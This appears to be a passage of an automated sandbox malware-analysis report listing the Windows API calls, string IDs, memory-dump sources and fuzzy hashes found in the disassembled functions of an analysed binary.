                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0016EC1E
                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0016EC94
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0016EC9E
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0016ED0B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                          • API String ID: 4194297153-14809454
                                                                                                                                                          • Opcode ID: c59cac1d32f324b5fa7cdbb58e5a368bfb81fc5bab20efb529796c6a4397d357
                                                                                                                                                          • Instruction ID: c0fe45518a3c4afbd15c7711349f786647ababa61af1ba50f16a740a42b69702
                                                                                                                                                          • Opcode Fuzzy Hash: c59cac1d32f324b5fa7cdbb58e5a368bfb81fc5bab20efb529796c6a4397d357
                                                                                                                                                          • Instruction Fuzzy Hash: 8F31C139A002099FC700EF68DD49EAEB7F4FF54700F144226F502E7291DB719A61CB91
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0015C782
                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 0015C78D
                                                                                                                                                          • GetParent.USER32 ref: 0015C7A9
                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0015C7AC
                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0015C7B5
                                                                                                                                                          • GetParent.USER32(?), ref: 0015C7D1
                                                                                                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0015C7D4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 313823418-1403004172
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0015C869
                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 0015C874
                                                                                                                                                          • GetParent.USER32 ref: 0015C890
                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0015C893
                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0015C89C
                                                                                                                                                          • GetParent.USER32(?), ref: 0015C8B8
                                                                                                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0015C8BB
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 313823418-1403004172
                                                                                                                                                          APIs
                                                                                                                                                          • GetParent.USER32 ref: 0015C8D9
                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 0015C8EE
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015C900
                                                                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0015C97B
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                          • API String ID: 1704125052-3381328864
                                                                                                                                                          APIs
                                                                                                                                                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0016B137
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ArraySafeVartype
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1725837607-0
                                                                                                                                                          APIs
                                                                                                                                                          • __lock.LIBCMT ref: 0014BA74
                                                                                                                                                            • Part of subcall function 00148984: __mtinitlocknum.LIBCMT ref: 00148996
                                                                                                                                                            • Part of subcall function 00148984: RtlEnterCriticalSection.NTDLL(00140127), ref: 001489AF
                                                                                                                                                          • __calloc_crt.LIBCMT ref: 0014BA85
                                                                                                                                                            • Part of subcall function 00147616: __calloc_impl.LIBCMT ref: 00147625
                                                                                                                                                            • Part of subcall function 00147616: Sleep.KERNEL32(00000000,?,00140127,?,0012125D,00000058,?,?), ref: 0014763C
                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0014BAA0
                                                                                                                                                          • GetStartupInfoW.KERNEL32(?,001D6990,00000064,00146B14,001D67D8,00000014), ref: 0014BAF9
                                                                                                                                                          • __calloc_crt.LIBCMT ref: 0014BB44
                                                                                                                                                          • GetFileType.KERNEL32(00000001), ref: 0014BB8B
                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0014BBC4
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1426640281-0
                                                                                                                                                          APIs
                                                                                                                                                          • __swprintf.LIBCMT ref: 00167226
                                                                                                                                                          • __swprintf.LIBCMT ref: 00167233
                                                                                                                                                            • Part of subcall function 0014234B: __woutput_l.LIBCMT ref: 001423A4
                                                                                                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 0016725D
                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00167269
                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00167276
                                                                                                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00167296
                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 001672A8
                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 001672B7
                                                                                                                                                          • LockResource.KERNEL32(?), ref: 001672C3
                                                                                                                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00167322
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1433390588-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00164A7D
                                                                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00163AD7,?,00000001), ref: 00164A91
                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00164A98
                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00163AD7,?,00000001), ref: 00164AA7
                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00164AB9
                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00163AD7,?,00000001), ref: 00164AD2
                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00163AD7,?,00000001), ref: 00164AE4
                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00163AD7,?,00000001), ref: 00164B29
                                                                                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00163AD7,?,00000001), ref: 00164B3E
                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00163AD7,?,00000001), ref: 00164B49
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2156557900-0
                                                                                                                                                          APIs
                                                                                                                                                          • GetClientRect.USER32(?), ref: 0019EC32
                                                                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0019EC49
                                                                                                                                                          • GetWindowDC.USER32(?), ref: 0019EC55
                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0019EC64
                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0019EC76
                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0019EC94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 272304278-0
                                                                                                                                                          APIs
                                                                                                                                                          • EnumChildWindows.USER32(?,0015DD46), ref: 0015DC86
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChildEnumWindows
                                                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                          • API String ID: 3555792229-1603158881
                                                                                                                                                          APIs
                                                                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001245F0
                                                                                                                                                          • CoUninitialize.COMBASE ref: 00124695
                                                                                                                                                          • UnregisterHotKey.USER32(?), ref: 001247BD
                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00195936
                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0019599D
                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001959CA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                          • String ID: close all
                                                                                                                                                          • API String ID: 469580280-3243417748
                                                                                                                                                          • Opcode ID: 5729c9eacaa5f9f825b3b8639c2fbf35a1fd7a141007cbad7cbde672643a64a2
                                                                                                                                                          • Instruction ID: da9399efc096b88bef2333a376fcb248e37b29c97b13c89c498132034d14c37d
                                                                                                                                                          • Opcode Fuzzy Hash: 5729c9eacaa5f9f825b3b8639c2fbf35a1fd7a141007cbad7cbde672643a64a2
                                                                                                                                                          • Instruction Fuzzy Hash: 64914D34610622DFDB19EF14E895A68F3B5FF25704F5142A9E40AA7662DB30AE76CF00
                                                                                                                                                          APIs
                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 0013C2D2
                                                                                                                                                            • Part of subcall function 0013C697: GetClientRect.USER32(?,?), ref: 0013C6C0
                                                                                                                                                            • Part of subcall function 0013C697: GetWindowRect.USER32(?,?), ref: 0013C701
                                                                                                                                                            • Part of subcall function 0013C697: ScreenToClient.USER32(?,000000FF), ref: 0013C729
                                                                                                                                                          • GetDC.USER32 ref: 0019E006
                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0019E019
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0019E027
                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0019E03C
                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0019E044
                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0019E0CF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                          • String ID: U
                                                                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                                                                          • Opcode ID: 0bf2a59239fd92464ac7b99634b2b8229c80e13d014b1781b45c8228387fe497
                                                                                                                                                          • Instruction ID: 3cc0fd5adbe42486666225ae4a2ba59c8fa367bea31c17996b761ed9b412a687
                                                                                                                                                          • Opcode Fuzzy Hash: 0bf2a59239fd92464ac7b99634b2b8229c80e13d014b1781b45c8228387fe497
                                                                                                                                                          • Instruction Fuzzy Hash: 4271F331600209EFCF25CFA4CC85AEA7BB5FF59350F184269FD566A1A6C7318C81DBA1
                                                                                                                                                          APIs
                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00174C5E
                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00174C8A
                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00174CCC
                                                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00174CE1
                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00174CEE
                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00174D1E
                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00174D65
                                                                                                                                                            • Part of subcall function 001756A9: GetLastError.KERNEL32(?,?,00174A2B,00000000,00000000,00000001), ref: 001756BE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1241431887-3916222277
                                                                                                                                                          • Opcode ID: 35147f0a87edd1dd50977c3e9717f5c7e17a08c21410e7bfc3a2eac1f15086d4
                                                                                                                                                          • Instruction ID: f89211e1c9c2d88df887bf83c457a599c569a7b80908c33bd6bdfdf6a415446b
                                                                                                                                                          • Opcode Fuzzy Hash: 35147f0a87edd1dd50977c3e9717f5c7e17a08c21410e7bfc3a2eac1f15086d4
                                                                                                                                                          • Instruction Fuzzy Hash: 5341AFB1501618BFEB168FA4DC85FFB77BCEF09354F10811AFA099A151E7B09E448BA0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • _memset.LIBCMT ref: 0015AF74
                                                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0015AFA9
                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0015AFC5
                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0015B00B
                                                                                                                                                          • CLSIDFromString.COMBASE(?,?), ref: 0015B033
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ConnectConnection2FromQueryRegistryStringValue_memmove_memset
                                                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                          • API String ID: 1159971868-22481851
                                                                                                                                                          • Opcode ID: 84086df0d60527a53b907603c850086502cd69453be99f37242d2e4a2edca353
                                                                                                                                                          • Instruction ID: 709d6f20dd99b9454e27b79c597b1f7d3ef1fa36fee682134d496b02bf1afd43
                                                                                                                                                          • Opcode Fuzzy Hash: 84086df0d60527a53b907603c850086502cd69453be99f37242d2e4a2edca353
                                                                                                                                                          • Instruction Fuzzy Hash: 45414D76C1022CABCF11EBA4EC85DEEB778BF14704F40412AF911A71A0EB749E54CB50
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,001BDBF0), ref: 0017BBA1
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,001BDBF0), ref: 0017BBD5
                                                                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0017BD33
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0017BD5D
                                                                                                                                                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 0017BEAD
                                                                                                                                                          • ProgIDFromCLSID.COMBASE(?,?), ref: 0017BEF7
                                                                                                                                                          • CoTaskMemFree.COMBASE(?), ref: 0017BF14
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 793797124-0
                                                                                                                                                          • Opcode ID: cd2eb9d8ac6d4c47f5de9d8989de82b2ba2ae9b966293ce57ee31448532ba878
                                                                                                                                                          • Instruction ID: 6af6868b5b3b8b79d72404414a1cff874c28f71dfe6cd80c19181ab868e4c957
                                                                                                                                                          • Opcode Fuzzy Hash: cd2eb9d8ac6d4c47f5de9d8989de82b2ba2ae9b966293ce57ee31448532ba878
                                                                                                                                                          • Instruction Fuzzy Hash: 93F11A75A04109EFCF14DFA4C884EAEB7B9FF89714F108599F909AB250DB31AE41CB90
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001249CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00124954,00000000), ref: 00124A23
                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0013B85B), ref: 0013B926
                                                                                                                                                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0013B85B,00000000,?,?,0013AF1E,?,?), ref: 0013B9BD
                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0019E775
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0019E7EB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2402799130-0
                                                                                                                                                          APIs
                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0018B204
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InvalidateRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 634782764-0
                                                                                                                                                          APIs
                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0019E9EA
                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0019EA0B
                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0019EA20
                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0019EA3D
                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0019EA64
                                                                                                                                                          • DestroyCursor.USER32(00000000), ref: 0019EA6F
                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0019EA8C
                                                                                                                                                          • DestroyCursor.USER32(00000000), ref: 0019EA97
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3992029641-0
                                                                                                                                                          APIs
                                                                                                                                                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0019E9A0,00000004,00000000,00000000), ref: 0013F737
                                                                                                                                                          • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0019E9A0,00000004,00000000,00000000), ref: 0013F77E
                                                                                                                                                          • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0019E9A0,00000004,00000000,00000000), ref: 0019EB55
                                                                                                                                                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0019E9A0,00000004,00000000,00000000), ref: 0019EBC1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0015E158
                                                                                                                                                            • Part of subcall function 0015E138: GetCurrentThreadId.KERNEL32 ref: 0015E15F
                                                                                                                                                            • Part of subcall function 0015E138: AttachThreadInput.USER32(00000000,?,0015CD34,?,00000001), ref: 0015E166
                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0015CE06
                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0015CE23
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0015CE26
                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0015CE2F
                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0015CE4D
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0015CE50
                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0015CE59
                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0015CE70
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0015CE73
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2014098862-0
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015A857: CLSIDFromProgID.COMBASE ref: 0015A874
                                                                                                                                                            • Part of subcall function 0015A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0015A88F
                                                                                                                                                            • Part of subcall function 0015A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0015A89D
                                                                                                                                                            • Part of subcall function 0015A857: CoTaskMemFree.COMBASE(00000000), ref: 0015A8AD
                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0017C6AD
                                                                                                                                                          • _memset.LIBCMT ref: 0017C6BA
                                                                                                                                                          • _memset.LIBCMT ref: 0017C7D8
                                                                                                                                                          • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0017C804
                                                                                                                                                          • CoTaskMemFree.COMBASE(?), ref: 0017C80F
                                                                                                                                                          Strings
                                                                                                                                                          • NULL Pointer assignment, xrefs: 0017C85D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00189926
                                                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 0018993A
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00189954
                                                                                                                                                          • _wcscat.LIBCMT ref: 001899AF
                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 001899C6
                                                                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001899F4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Window_wcscat
                                                                                                                                                          • String ID: SysListView32
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00166F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00166F7D
                                                                                                                                                            • Part of subcall function 00166F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00166F8D
                                                                                                                                                            • Part of subcall function 00166F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00167022
                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0018168B
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0018169E
                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001816CA
                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00181746
                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00181751
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00181786
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                          APIs
                                                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 001662D6
                                                                                                                                                          Strings
